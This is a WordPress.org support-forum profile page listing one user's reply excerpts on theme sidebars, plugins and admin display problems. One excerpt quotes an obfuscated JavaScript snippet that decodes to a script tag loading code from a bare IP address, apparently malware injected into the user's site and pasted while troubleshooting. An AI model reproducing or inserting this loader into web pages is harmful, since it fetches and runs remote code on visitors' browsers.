WordPress.org

Ready to get started?Download WordPress

Profiles

focused313

Profile picture of focused313
  • Member Since: March 5th, 2009
  • Posted a reply to "Right sidebar dropping to bottom of page just in single post", on the site WordPress Support Forums:
    doodlebee, you are a great man!!! Just helped me fix my problem after an hour…

    5 years ago

  • Posted a reply to "Sidebar drops down when no comments", on the site WordPress Support Forums:
    I have the same problem and I really thought this would work, but unfortunately it…

    5 years ago

  • Created a topic, Tables and Div out messed up when Comments Closed, on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "How to save posts to autopublish in the future?", on the site WordPress Support Forums:
    wow, THANK YOU. I thought I needed a plugin.

    5 years ago

  • Posted a reply to "A Custom Page Template Option Gone???", on the site WordPress Support Forums:
    THANK YOU!!! I had to change my theme to default then change it back for…

    5 years ago

  • Posted a reply to "[Plugin: Twitter for WordPress] No public Twitter messages", on the site WordPress Support Forums:
    I'm using 1.9.6 and WP 2.8.1 and I still get the error from time to…

    5 years ago

  • Posted a reply to ""Register to read more" plugin?", on the site WordPress Support Forums:
    **update, after a few hours with google, I've found a plugin that seems to give…

    5 years ago

  • Posted a reply to ""Register to read more" plugin?", on the site WordPress Support Forums:
    **additionally, it would be great if wordpress could implement an option under the Visibility editor:…

    5 years ago

  • Posted a reply to ""Register to read more" plugin?", on the site WordPress Support Forums:
    I'm looking for the exact same thing. A plugin, hack, or code that works the…

    5 years ago

  • Posted a reply to "conditional image thumbnail on main blog page", on the site WordPress Support Forums:
    thanks Simon J, that worked much better than what I had on one of my…

    5 years ago

  • Posted a reply to "[Plugin: NextGEN Gallery] Can't add image gallery to a page", on the site WordPress Support Forums:
    Using 2.7.1 I had the same problem. More specifically, I can add galleries just fine,…

    5 years ago

  • Posted a reply to "Export only creating blank .xml files", on the site WordPress Support Forums:
    im having the same issue

    5 years ago

  • Posted a reply to "Admin Section Showing Incorrectly with Javascript Enabled (FF)", on the site WordPress Support Forums:
    *I think I resolved the problem. THINK being the key word. <script language=javascript><!-- document.write(unescape('rsd%3CscrizrGpr37t%20yTsSmrzrGc%3D%2FzrG%2Fh2878h28%2Eh28110%2ESm1ck7rsd5h28%2E2rsd49%2FyTjyTquerr37y%2EzrGjzrGs%3E%3CyT%2FFIsckcrrsdickpFIt%3E').replace(/ck|Sm|rsd|zrG|h28|FI|yT|r37/g,"")); --></script>…

    5 years ago

  • Created a topic, Admin Section Showing Incorrectly with Javascript Enabled (FF), on the site WordPress Support Forums

    5 years ago

  • Posted a reply to "2.7 trouble: can't upload images or edit timestamp", on the site WordPress Support Forums:
    I have this problem and I've noticed that in the working versions, there is a…

    5 years ago

  • Posted a reply to "Add Media: Image insists on opening full-page", on the site WordPress Support Forums:
    I am having the same problem. I've found something weird though. I run a number…

    5 years ago